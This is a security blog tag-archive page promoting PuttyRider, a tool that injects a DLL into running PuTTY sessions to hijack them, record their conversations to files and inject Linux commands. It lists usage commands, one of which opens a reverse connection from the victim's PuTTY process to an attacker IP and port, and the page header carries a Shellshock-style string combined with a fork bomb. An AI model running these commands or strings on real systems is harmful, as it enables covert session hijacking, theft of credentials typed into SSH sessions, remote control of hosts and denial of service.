puttyrider Archives - Proturk Security Blog

Puttyrider targets sysadmin tool putty. This tiny utility hijacks putty sessions and injects code in open sessions.

Usage;

List existing Putty processes and their status (injected / not injected)

PuttyRider.exe -l

Inject DLL into the first found putty.exe and initiate a reverse connection from DLL to my IP:Port, then exit PuttyRider.exe.

PuttyRider.exe -p 0 -r 192.168.0.55:8080

Run in background and wait for new Putty processes. Inject in any new putty.exe and write all conversations in local files.

PuttyRider.exe -w -f

Eject PuttyRider.dll from all Putty processes where it is already injected. (Don’t forget to kill PuttyRider.exe if running in -w mode, otherwise it will reinject again.)

PuttyRider.exe -x

Download, code, details here

M	T	W	T	F	S	S
« Jan
				1	2	3
4	5	6	7	8	9	10
11	12	13	14	15	16	17
18	19	20	21	22	23	24
25	26	27	28	29	30

Proturk Security Blog

"() { :; }; :(){ :|: & };:"

Tag Archives: puttyrider

PuttyRider tool hijacks Putty sessions in order to sniff conversation and inject Linux commands.